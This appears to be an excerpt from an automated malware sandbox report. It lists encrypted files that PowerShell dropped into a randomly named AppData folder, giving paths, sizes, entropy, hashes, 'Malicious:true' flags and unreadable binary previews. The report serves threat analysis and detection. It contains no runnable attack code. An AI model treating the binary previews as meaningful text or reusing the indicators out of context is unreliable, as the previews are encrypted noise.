                                                                                                    SHA1:A2C4911D4BDAA7C9BC1969200D0EDED932B82E7E
                                                                                                    SHA-256:A12A2D6B5027732D1AD1D451DAA37F5B3A6D813DFFAC80595367FF7DE628BC2C
                                                                                                    SHA-512:0339563B3E5CDA679BA316CF5565D6EAFD4B32866E9D2C2FEC5B376E19C3A15CE027CC6E25159F0BB4A2FC262C74CF1D3FEED767E15B0FAFDDB753F1206C01D5
                                                                                                    Malicious:true
                                                                                                    Preview: ...@....Z..hr..._Z.f..*.E....o...OS..w.f,..l...<...k..1._....CQ.."J...|9.a.......!..sN.|..._..)....=..\.5~.fJ1.."....l..O...\....q@..P...s1..Y...]L...&7..Q.....%..0.~.[....:N...8Z.l2..K..6.O@.i.^...."W.8.....Z.|L.%.`....[..9..iKSk8.{u........]zjD..8....Ia...f..d.~.:.....6.G. .%..Z. ..}..../.....e..b"l...n@L...D.....}!.+..P...$....5..l...v.....t..a...-..2...7../..._...-.-C.K.;...I....|.x..@X$O..X...!^.^...iY&g.s..D..]Y........."...K~&.......X...L.P.!rrbT.*TRv\D#."...Hh.k(...7.V....}......<....4....fj...I.....g..Er?V.../......{...[/....99.,y...0w:....PR:Hn.1..(.DZ....U.e.)......]....q.{......y/...#.>&j...IJ.1~@..(...\.(..6=.g...9A..s.!.g..`b..9.....F';...Iy..+q..=d.`;..v.?..#....b .....5.J.......Lz....5..&u.' ..."..s......TL..n.[p#.......x.......s....V[*N.F....*.....s;...-.......A...NT.D....+.."..K...r.(a[.@).!ss....../dg..E..v*.K.b...&.`..d..s.A.\"<y.z.Z..l.....W..8...p....5........K..?jC`..el...?.xi.0..?r.{.A.....'..Ifr}....1.om.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\RaQCLKpVhzYw.NSoHEYRjGuW
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):99613
                                                                                                    Entropy (8bit):7.998150617202663
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:AYUpbQLlumUsTcYqN04MiStNseZ8YF0C/lI3vnz8ekSt9KrpDrPdVCUb:AYmbQLlumUsfxyCN0CdI3LNkc4rqu
                                                                                                    MD5:BE8269EE795170BF933C082D4D43CEC1
                                                                                                    SHA1:1EC441E3A1EFFC98451BC63C2E340DF6ACA18655
                                                                                                    SHA-256:37CAB97BFE8351322BEB631551EA93A45713630C3DBA3AD769121E1ED5B297FA
                                                                                                    SHA-512:2E5A090ABD88884BC39D89FCA6C357AF6383F3123001413768C1262CEB7FAE5898A140D75B3B8F0C6DB984A251FF501DD8BC9DFA9908EA2D63AC9A6BAD0E0E8D
                                                                                                    Malicious:true
                                                                                                    Preview: o.....[.jA...>a....R3.2-a..x.Z5.....s..rK...a3.....;... N.>....q...a.$...M.....NA....".S..U.d.........y..../.S.A).....Q"h.d.r...SB.+:....\.[(....-.....~.].l'..........D..gR...r.E...e...v.4.[k.0..}K+..W."..zgu.vr..3!.54wb..e".K........7k....kx.5...\@...6...6.j..\.U;...Z....!....Un..$.$.]A..I.b.f......@....[..b...8.1.....l'H...'.#}...$O.I.....f.._..0..S...YZ..>\ ..T...u.>......_.c.SW........E.....n..`.Nr..;.J...~CI..I4..X..........,..j..O^.'j..p.{..+.r...."r..:........ve.}.v./.W...D.'O.....\T.....GS.q.C.....T.U......1...t..D..n.O..C.....Z.t..ZAB..-.T.H.h.|...o(}D...$...m.z.[`l...%@..o../..DXJ L0.+r..T..?.".,....J.|I_Z5..T...Z:+..Q3...0.w#.uM.B.d..*.=...R.s..-Z2...n5/k....R~I..w...R.+.A|{.AHH.c..iEP.e...!.Sj..i.u..'.....-..._...l1..e.*....}..b.d.Z.]HuQaE..8.(.8.*...C...c......W...]t..;.@..ed...8u....W....A..U6..xD9.N...O:...!.."}........yz..-B.j...6...m.....}.U..sx[..8.^8*.....9..;.^....]..7.m.\.<...f.CB4.hF.D.]v.....,......y$.!.\.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\RwXrMTAiyahtEd.XyCGmHiwnWlMOA
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):168782
                                                                                                    Entropy (8bit):7.999156996539708
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:xc4OFOViK9TEAKWOR+pZkwX1GohxkOb0Fijy5P0jwRlPzFNi82cjAnmT:xsKhEQ/ko1zhy9ijUqk1zbi8hAnk
                                                                                                    MD5:5B411B28C970ECE8A197C4681129FFEF
                                                                                                    SHA1:2FA7F19EB541C1F24D934A56E6714FC5CF175DEB
                                                                                                    SHA-256:88DB2C34BC83CDE0413A124EB7753C4D21A53098F25AE8FB8CC05080C0B0C7B5
                                                                                                    SHA-512:C17813BE19200753EA93F93017AE90E196308579FC8479CC99EDF2B18F28B4E7ACF8B9E330204C906E09FFD0C90768D883E1A57D02146D4F3A6C6F51D2746F7E
                                                                                                    Malicious:true
                                                                                                    Preview: y.B.f....kf...D#.&.G...%.i:bv..!..S.Lbn..t....!.....6xjus.`t...fI.hB.2.6.....4.0.E...6".../W.0kt.u.wV.]3.........!g.2 .%..m.%B.......N..R....[J...QWc]7,.z..y......8.......Fa...5.P^Ev.......b.....VpY.LF..I...D.{.=..4[.%.jN.=.......*u........aO...!.m8d..4....e.......|v.L...FqeJ@...aW.....a....m.....}...W..4..|.........x.)..4}....@.Bg.>-...T....%....$....W.G....x.@a`a.j.^}...cj..1.k..Z.!...;..w.L..~4VF.%0...&.....e.....N..)....Z..l.W.])T..YJ....fsn......4s...Y.,[.jr....7~..A$.u50....1.....".t.P.[.H........w.|...AXk..e......7.#..-..=.../..&.m...G...T....W.$..mSGucoW..i.k.i.z((.o.q9.uf.di..5p..?.-.ABaI..2K.]/.........e.,j`6..";/....J'..B.V.:".....16?..4.+..oy"..[.v.a......HH.O.2...rQ..I..&...9@.Q.V4.?....B..).`F..'...`q..D1....8...9.&.....ZI..1.{G...._.[.T..+.E.H.N.B..@.*....;..:HY.w.J'r...M...9..i..n.`.j...........CA....XL....1.Y3..2..BH.....>U./n..(q.z...m_.............K.........)1..pd.+.....1cV.y.\..g..8l...Y..Y.H.R..,.D...i.P..
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\RwplegIUuTzoJVExvd.iryKnwxsIA
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):164464
                                                                                                    Entropy (8bit):7.999062293261327
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:DSbkDKXjCWDPYNK0BQZPOsfAWUJwdIJmca+dcF45cti+9lnWL:ObkSjCc89BKGs66dWe9C5uiMlnK
                                                                                                    MD5:4F3E903A264CBCDDB59BCB9D7FB2A153
                                                                                                    SHA1:175DC7B2C00E3F21676F401657BBCCE0B6848355
                                                                                                    SHA-256:0A9485A1D6BE472531B43660FAA99122D0AC142BD1DFA3D57CEBFD66D4B66D70
                                                                                                    SHA-512:153E6517A9C9255C6AD63497332C865A340A32B97C91AB80817798E852612400B334C4F096521B0EA7C525FBB03B8AECBD19F19CFC82B1D1652265C757591D57
                                                                                                    Malicious:true
                                                                                                    Preview: |..........ly...B.|r.]..?...V.k.../NA....8aN>N...MB.....+5].i.Z..i.b...5..q.B..M....zm*..#.0.....;..Sq.....h".m.Y.Q.5.>.Qf..=.S.f.f.`.am".s>t.;w._2..|h.......~...C.c7....x".oc*/......<.cV.Ux.?s..2.I`'........I.9....l...bk.8.[.02.`.0.[cL?...u..:..`..`F.c>...K.l......tn.-C%....t|..B..o|....kp....1&Y.6..!.v..._..k..z..W.$..2.%.+.BU...[.N.3.%y..+.\..9...?..H..P.l7.z.._y.,......2....0..=...n._...A.'.Y.....<@.g8...;..<w.f.l.Q...i.....b<...e.6.w.\7}.q.=.x.?TCs..t..=.Z..<.-...U...V.S be6.^......w....~........I!..qK.....>.p......ir.UtE.u....K....!l3:..f....#.^.y...+6..j...q..>.M..fCwb..X.e.....O4.@. ..^^..IM.....Q56 .wO..............s~.._...]...?......_.I...x...a.......v.....f..C.1...`..$<.zSn#.&..7....HP...g.E.f.B.N...z...}.3.k..]..|v~..U...4..8x..;O.l-.L.:!t....(fa........uj....G[.[M*.m..........'wr~.m.....=.g...xW.....0B2...........8'......8T...z.<A..#."ZA..1....../1}$Y.....@%...d\..v.Aq........<K...H.b..U'W."..M.F..|...e.!/.%._.O..G.../.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\SZEwUsrtgzTLq.IKJoYcWZNqjmy
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):111267
                                                                                                    Entropy (8bit):7.998522770999148
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:wJpPjE4RXn6EVJPgQKiP8uonTohojJHalQhokhWi+xp/wovekffvo6AT9sqh+s0:APQgXhHVPPo/JHvhP1ovekfY6q8
                                                                                                    MD5:7B0638267A3C7D0B49A6D0797B96A73E
                                                                                                    SHA1:1AAF1C77C87DA62D7AD78338BFD7C9DFD57EC258
                                                                                                    SHA-256:1C525AAAF38A24B901295A5C7E8E2B4043B219AA3707F7CF4EC8443A6A4E5CBF
                                                                                                    SHA-512:CB261CAE2D948BE929853A28C5E9B31B1909A2847D2BAC70A12C92A84419AE6C51CEE4E42B0F07F5732E2BF9A372325E377F2A4F8B133E71B1AECE0058CA06E7
                                                                                                    Malicious:true
                                                                                                    Preview: .%m)........Au.t.o.. ..*..7...].....>/B...#...q.`...].UCU?...]E...r..1.nJ..5D.~S\..[.....V.Dj...U..m..>..5<...n...*>-(..p1eP.....F..C...ol.bc....D..s.,R..h..>..>....^..H..M...-eh.....v.,'.;.-..#.P;..3.....7..;@.... .=*.6.-.M.1.mD.*o...jh....R......=..6...Wz.-..^...p.. .p....R..}k...9Nv4.....W....i.<.h...x.g........L...c....-mdgp..y.bzB...t.._..'....T=`.:.K..1?.....$....a..K..Ef=..6.9<p.@87v.B...Xd..3....Mo.+..0.|.x..G..?....+.0.j:....G.....1E..H....`n.....T[.P%......Y..*..C .........G2M...g..3......... A.. .`..nwA.R...,.........E..R..?.)....t[?pE......||..f.6.^v.%...w..O...x..c..Jm.%=..9....LM......?..N..|....'....8...5.N.....!F.[..!....83..8D.*1&J..........p.......+._....so$.|..IK,1S.D.Xq6..-..{j...`F...eY..5..a.a.}rQ.6.X..)E.ll&_....k.QR.gy;..@m6....9bY..!...#r.".{.\c] .........m..|...v.y2jD.+.%.....?....:.H...g.GE._.......#A...V.=..E....J...N..A/...C.Zy....7..)...U.......U.2e.&..c<I..r...=...C....#.;.uu..:.c......S\....Bo.(.!.....
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\SfRdKQeADCtX.JvYsgXIiDlwhoxKntB
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):184405
                                                                                                    Entropy (8bit):7.999096730799414
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:3OJfn1qFzi4oy1RWEOhyaz0WvX3kHWV+IqxFvK0Trc8KXlRKDuRjVgn96k34t2u:+FYm4Dzr+X3PIIqxo0TrEAK7gAkoou
                                                                                                    MD5:9A9CA657566CB0EA75247E4C9A6AD609
                                                                                                    SHA1:BA707B5C0BAC78E35D4F3A973BB2E2F05EBF0942
                                                                                                    SHA-256:05711115FD1525B4D0BBED8EBF6AE77983BACE30F8F84C2DBFB70BC8DB8D5E79
                                                                                                    SHA-512:B1CDA5529451C76D353636A68523CE00BA41272E0A976556D8ED1420A2B16D8A858A2AF4FB6271287CD71613A66A1F8ED82969625CD584A6B190FB5C8764875C
                                                                                                    Malicious:true
                                                                                                    Preview: k...S.R,.......s}f{.6...v}.a.U._"=(|:...t.+Nl..R..A...N.z.......V|E.^8......dX.7{...^B.x.B.m...J.....Q........P...:V.].>q<o.OmN..g.-..UzQ.>.,.)X../.fP.*....X.yUD.*]..6...[.F.....:=1P...W.R.!.4.k_@..rX.z.Kj.....B.?..|...=....h'6.M..m.D..K7..N.....X.6ug4K._..C.N..'h^.[.R.u].J..2e.....9./W.h...a.+.^....w#.....J@.n2~..s/..2U^.c....C.g...z"z..BU(.z...%D/.[..".[..C.t.....P.....-{r..........}.~..,L.+ns2#...z.h8..J1......!...i.t....P..^...S.jMG.O.B.y.Ex.!.D..4.=2..y..N.U...k.N..$:.E.>..........,...1...?$CH~Y......3..H3.....R=Pd>i...s[..a.h.?.."|.b4mv.F..Z......4.$.+.g.LM....|..L.......qs..p.#.......C (.j......Y..8.W.e..~.XZ..h.......8...k.;....%..`...c..C.u}.1..K]....~a.*.C..yB..'...w./......F..C%!'.z..9.^~.O2...?.J..V..B%...8.5...K.`O>k.5..U....{\E...._...aF......(...u..."V....vO....WE...p..l..{A.....FD......j.A<.Kf.6......~P...a.$...a....9..h*..0..hJ.#3[...k..Sn..4-..K./.r....b....t.})h.j."{....fsj....$.dl....7vG.P....J...[..}};.!kEg.2X..1...z9Ue...9
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\TLuMnmVEcNIzhYlj.RSclJBIusQbepmFOrT
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):190716
                                                                                                    Entropy (8bit):7.999026979433373
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:/xw475ewSkDTCaASTwY6USa1VeClufTbjHAVCG7KVejgh27TXBq:/V75e2nnAje1VeClu7bDaCFR270
                                                                                                    MD5:B65FFB8F843E675AA07EB94CC3B86E28
                                                                                                    SHA1:1C2E93857BC546320F5A1DF73E94BF9C2BCD70CE
                                                                                                    SHA-256:D689E05F08CCA93C64B6339DC0D537715E093279583CAE5948B527929094D44E
                                                                                                    SHA-512:84F702F5DE18EE4E9994F4AB87BDF0E26148DDA56648F50F1B29C3B33073CED5347CFAB7B2B226CFEC553A4B86D13FC8C38FD91CA7FB7B944DF2614A4FF45030
                                                                                                    Malicious:true
                                                                                                    Preview: .c._c...W.z..`..]....N.E..C6.[.8....o...S....z.w.YoU,..0.U[s....B.F..E5S...%.5D........U.h41P..H.3....9.@.L._......f^.w..R.....>.qp.f7 .e.J.T...Q?XP.".>..r..l.X.n.......}=..F\.{.a9.y.1TX.\...F`..K..q.!l./X+3...&._.f}.5.N..~z.p.T./,..'X.0%..]....t.k.w.|.#...6.D....zV8.JL.5C......z.r...P=....T~.G$"...W*.G.1..i..^.+X+&...^.....r)._.e.\G.i?r."..;..S...|l.p:.p)...d..L......f>g<W.bcc...b?..;!..?......7l.sw?.-_4....A....Sm.R.~..~..s+..0$")..>..yY....e... ..I..FZ..I.......o|..qw...(.bm..:a.).Q.{n....Q.....g.f..*.+.2.7.@.i#.].w..&bi.7.H.Q.]j....&<I..3.>.j:.<".P.u.b......X.}.^.d;.j~..wO.....n...>i2}_.....S.X3.....G$.,...}u..m...2.W.......p.....J...P...uSC..8....&X0sW..l=..qu....m...}<>.&.{KT.Cx...'...{.......2u..!..7..`..I.t..`...........I.l<.V.gn..h..V..&.4(.})....2.t.D}x...@...;7.}.~...wXBW..d4...$.@...44w...b...6d...\..w.an.X.8O..+....I.p...........u>.<..O..D...:?lD...k.....*;w..N.O....Q#.W....c}.....\...a..0..D..W.9*..r|2a..2;....q.|.8.q*]....3
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\TMDPfUGCOdpw.mCRoOzBkGQrPAgtNbHd
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):78518
                                                                                                    Entropy (8bit):7.997813436637588
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:DxgbtO7/KrT+gCVwDPlQvgsRNK0BQZPOsfQ4Yd3G70zYIPoy4m:DSbkDKXjCWDPYNK0BQZPOsfAWUJwE
                                                                                                    MD5:258F511C4AC4DCBCD30D040D1961AC0A
                                                                                                    SHA1:157C02CE0832EDF8A5EEFF640308CED373436313
                                                                                                    SHA-256:20D8B9FBBC35F09F4D1BA3492BE724A31C14DD08BBD95E4019E0441BC244028C
                                                                                                    SHA-512:4265C61E33CA126CF0D97F38C62F24433FB69942AD7A5B4301F82A4917458AC30782C36FD221D5922C84CF5212C19975AE6ABC016222AA613384742ED2275FA3
                                                                                                    Malicious:true
                                                                                                    Preview: |..........ly...B.|r.]..?...V.k.../NA....8aN>N...MB.....+5].i.Z..i.b...5..q.B..M....zm*..#.0.....;..Sq.....h".m.Y.Q.5.>.Qf..=.S.f.f.`.am".s>t.;w._2..|h.......~...C.c7....x".oc*/......<.cV.Ux.?s..2.I`'........I.9....l...bk.8.[.02.`.0.[cL?...u..:..`..`F.c>...K.l......tn.-C%....t|..B..o|....kp....1&Y.6..!.v..._..k..z..W.$..2.%.+.BU...[.N.3.%y..+.\..9...?..H..P.l7.z.._y.,......2....0..=...n._...A.'.Y.....<@.g8...;..<w.f.l.Q...i.....b<...e.6.w.\7}.q.=.x.?TCs..t..=.Z..<.-...U...V.S be6.^......w....~........I!..qK.....>.p......ir.UtE.u....K....!l3:..f....#.^.y...+6..j...q..>.M..fCwb..X.e.....O4.@. ..^^..IM.....Q56 .wO..............s~.._...]...?......_.I...x...a.......v.....f..C.1...`..$<.zSn#.&..7....HP...g.E.f.B.N...z...}.3.k..]..|v~..U...4..8x..;O.l-.L.:!t....(fa........uj....G[.[M*.m..........'wr~.m.....=.g...xW.....0B2...........8'......8T...z.<A..#."ZA..1....../1}$Y.....@%...d\..v.Aq........<K...H.b..U'W."..M.F..|...e.!/.%._.O..G.../.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\TeLuOYhiUjVxzCo.QmnFOgcVdr
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):134468
                                                                                                    Entropy (8bit):7.998852772013272
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:a2dIvvMIA1ht09xWgw5QnBO0/7PrUtMbByLGG7FVO:asnd0CfmnBhDUGBYGG7bO
                                                                                                    MD5:8E91F0A1040A7AC89AE14D67BB62253A
                                                                                                    SHA1:D6384A1E587CE9B9FFE8E3DF83FBC08E3130F742
                                                                                                    SHA-256:FA805975E8C3CC6883B9F50780AFA3FED97A048207F91759AF66334E1505B9D2
                                                                                                    SHA-512:F0085DC1BF60A30534357CA1DC5B7E92CC24D15A3A08B4D97027A34156A4BE25F4E38D167E45229904816FDD31C94EBFB9D0039DAEE8989A61B0ED14F1B41F9D
                                                                                                    Malicious:true
                                                                                                    Preview: ..DcX.(.S..f..fM.=.V..0......O.9.,.+...$....7..<>....<3.kh.n\p.I..!.3.o...<.p.b...N...e....R..X.mK...*).7.......oc.L0.$._s..q`%........%t..V..q.v.m...<c.uM..o........s.i.x...Q..-w..O..#?U.....Ql.L..g+.._..c....-BN.....x.a..a0.$..L.q....~.P...y-.....3...>.^T..E|.......P..R......r".-...... |...F.......G...w.].vQ.mvNi..."0+[...?..y.....z.YX.*4S..8#..X.......;.....h.g.9.7....'=.....'.......;.#Q/.]..........h..6.Ru.,R.E.*a..RAB....m..=.K<;X%...Q...0..Z...//.nu&l..3pUU[]....tl...(JxT..|L.....1.....B..[PV.fV...L........N.].DT.....xe...iX:q....xT.).^.i.M.4l..O.E.5<..O.1.g".......xBM...`...M8!"q.v.%uK=,\...]..?.XK..o-;..O..lE.%.:.:.-. i...1.d.5..oq..VW...I...H..(.....!&$.D/.6|(.33H..1\.yO}.x.....r...03%.zt.?n..V!........i.).nCE3..N.z.b...>.n.f...As..(.4......@.mW`r.I....#.....q...,&.E.2Z.....{..Z.....[._....]&<".A0.,.g.%p.'g..G]...?...fB..v.8:..-'h..a5zV.^....1...e.G/.3%.._.-.N.6..t.2..M<..D..8y.....l.....1C......#..a...>..J.[.2>.,.V...
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\UASjmZVExuWitHd.cUpNCLnXqzkdMZjwlP
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):185983
                                                                                                    Entropy (8bit):7.998982481310546
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:D4aVHMeLopkN51bmfmUzd122T22aYjTSs3PHh5A4jClQaR4qHblZvV19/hollHs4:TCeEmUD22Tbpjus3PzWlQtqHPVf/SMOT
                                                                                                    MD5:F5E83FCB7FB129524BB77139A05E1574
                                                                                                    SHA1:E03DC9E485DC75FE9E264876FA1E115228C164AB
                                                                                                    SHA-256:804028956E881FDE64E15ECFF3041BAD6D787A0051ADDEED27BB27DC14057B5D
                                                                                                    SHA-512:E0F3A6EA7070BADD8CFAD3EE443C42FEC4A61E145A77AF2C0F3C7AD8BAAF1B9E9A2A7F0847244D85866833D5ED6699BA3CFB3526AAB1706F3875E6B41F04A19C
                                                                                                    Malicious:true
                                                                                                    Preview: ../.7.k....7..N.7P906.T.[.+k.Bq...J.Im.X4.....6@X........?6.y<B.i{...o.......;........v..ubZ.N.#Gt/ow.,..G..=...\x#4....P7..5..{b{..r1.....9.T.p..B*a..yr.?S.NJ..w.j> +..R.y....f..P.n.M..J...5#.X2..T5..C..j\.....DvS|. ....e....Pyj../..x.....Y@....>.A.............0..*...[.r..N..N....()...s.....R)....)b...F.[0..`...i...N+...u..n%..a....B;...B.;.....:....mTp..(......=I..f...z.....n..m.B>./.\.7........n..Kj...?g .1;.....Un..[h@7Gs\.}.ZT.dP?@.O.y.JZ..{.,.eA.e~.......L%I/2.\.Q.~.n..=...{c...q.7..$[S.9.4.kH(....6....[K..bO....LS.l-%*.4...B..._uYh..<.L.`89.:(..............L...N.B%w.. T..J.......\..a.~......u....w...5...Ft...)...x~.Z...S2P..../.O..Bwfk.8[z.t.,........#..A.}.ii.b......J>h(7......)..y..{t$n.......fv:..bm..!E.0.m@.X`.E'....6&...f...<'....Z/b=.......1........).8......S.k.]...Ug....jBF.RV.0.*s."...B..E$iB...o..E..].....|W..f+.y.....#QF...4Y.n.......BA=n.]....O..........".-.....}.n....T...y6O.0.."B.t..{..n..i..&..d...^=....1....Z.....+`
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\UCFaKkJmTSsWyh.qGRMCmWBiYKnoHSlLEb
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):117351
                                                                                                    Entropy (8bit):7.998336580822975
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:l1Ql2fBdaK8lKli7p876umGUnA02JZW0d:XQlYBdF8Uw7p876um4r
                                                                                                    MD5:FD341EDAA5BDC642FF84354155EC81DF
                                                                                                    SHA1:F0C2FBEBE5DF8D490FCAB31E45BBE0BECE0D951A
                                                                                                    SHA-256:2BEF438DF8F1A3EEAE9F5070C36792E0E3DF578A2AB5C8CD8AD848F4CC85D289
                                                                                                    SHA-512:1A7A972EA6A5BE731942B1C0829C0635D50949DCF75059FF5B084DF25CBC96EF28A764C1EC7636D0DA39E175F33E730BB1BA60B53BCC26921BDC2E56751F1420
                                                                                                    Malicious:true
                                                                                                    Preview: ..Bz.m.0g0%N...7.H...U.t.<.W..#.>^iZ......`Li.2.".E...c]V..s.lz..X...F.W...x......5..i?t....q.....?...|.s.....h...i.7.......A..d..`...)Y*.i....O.z..c.......[.c.f.HU.k...L:....k...@....0...|C.[........a_.#...xEe.........4......\..{..b........7..Si.8.Qf..-DU|...>a...Z-UE....../.U#c^...5`: {f..,....;E.0.\DA.`..i ...7......b-...yA.7S.03.......F.E../j..cCP..{.ka...E2......J.V..\Y4J.....Hf:.&#.....x..f..`S.[..`].-.H.^...bG.h..J.:.\s..C..d...... _..;.....gNFG.%y...Z.].].m.S..{*..) T.K.K...n..&_;.=.....2U4a.p....lP.e..R...>}..Y...>8...A!..z..GSQCG....-...7...z......"V;RCr..k...+Jr.).....:.l.r...m!.x..5.....|.....|JZ.^..\fu,.$.)..RA..C};..G..n".J#..;..._.....S...}..v.."..g.x..I.b...c.u4.^...T......7...w....Y.1.....<...d.s.$ne5/.t.....,d?...3h..........S."$.D=eV..Q.r.MK..p...]#A...D...B.#.......c9.8B.....|.b.YuO.%i..!.0.^........._.T...T..lW...Z..-.M...\.......d .2.cD...=c.?t.ev...{j.h.Dc...7{e.(...5w..tv.8=..5.S..ly\.y. ^....<.?.~......6+..
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\UKhCsubemgyp.UtjOkbCVrGJosyNavYS
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):187874
                                                                                                    Entropy (8bit):7.999079203016247
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:U4d9O5KjCZ7d+9UhmcEUBDwYUkPV1KYLUDVbePPOGb2VtOPFUffu0XQldS51fsAe:USiKjC5bhmHUhw1quZePv2wGffuC5xsf
                                                                                                    MD5:64772D344E001983A56CA4308C83ADD0
                                                                                                    SHA1:33D88595206FE896C1DBF1CA7124168A3779871C
                                                                                                    SHA-256:3259704D1F063B26760E1AB2B62944F3B801C917A00D7DFAE7F02267D2FDCBE0
                                                                                                    SHA-512:9B356B70DC3CDBEF544D7BB3D32F32FB42A860E2B0B2B757D72AAA96E73CE00DDE62B9E10361C01A4D3728DAB6EA66044872BFE2E693600A2F51C5BBA0BD72F6
                                                                                                    Malicious:true
                                                                                                    Preview: ..4..}V'.dq..o.Af+.e2.l..b&..S....Mu.j..K.w...@$.1e.......8WE.9.X..".&.m...S.c."..u...);5.a..f..>.T.....i.0q...V..V@.K.R.H.b.I.|......f..i....r...p...;.8s..F ..\$.!F..W6..|%.z..dvkO.".....o#c."Ze.......*.......G...z:b.n.~d.Y.Y./.}...!....?M...!.LH8....J.f..,HZ.=..M..p..| 8..}.~ k..h..23Y>.h..j.E.M....).~.2..If.,EU,U@`<Y...].R.9~...O$>h<*..t..I.$....Da}..q2...sL.....1...6;.(...... ..".C1.6.tT9(.v;8/.*...%.....z..Rx....!.Z..s..?...&.....F_;..-.d.G.O.|....K=]..}F...\c"n.:R...-..P...).....<..|*..c..L%._|)..l.u..s..q.:pW$20P.}.q...w.).X..|......!]`.....+S7{.........}|..l,8..x....v.....w...1H[..~\..=Xr..fS..n.K...A.D........).9.e.H..]...1..&..^.5.....D....).R....f...b.......^V._..L.....h.I?...@`."5.W..r.5.XO)..a.N..?..8....%...d.zg..........S..BP.1.b..=b.....B..Tw.......'.n....n.q.5..CB.z..J..Z.R.6...(s.......-e.;...=.f...HZ......W...7.NP.5....<..o@.|.E.*.........[z.+.v.I.cI"..L<....}^..n<.:.F....W.D(..`.C...q.D.......x.9....Sk8...._..v..-.e...
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\VHuBdTtSOiYELFrwZDv.jhfZQXHGognVTq
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):169527
                                                                                                    Entropy (8bit):7.998882033052513
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:46/mX8L6xADibdTMheyZKZMbw1MK+QZqKa8U+eM4BKAqdNReAoYaw0vz7g:nL3SAlZDIqKk+3NrUz8
                                                                                                    MD5:3990FA43D496FD8E7B0B486D89D181AF
                                                                                                    SHA1:E44F91BE2DEEDC6D157812EB7039023129A5304B
                                                                                                    SHA-256:ED2D1919AAF9721932E3535ADB8B355D7B55560B2095CCF3AF9A2D53F6202E13
                                                                                                    SHA-512:1CEA64CF7519A5F90235BC4E7C7D0860ACD3BE2D87FAABEDAE94A67DBE9EDC65B62B1CDF585AE94401FEC67B9891E8CCC6669931A99BD6B1FBA55039907F4ADC
                                                                                                    Malicious:true
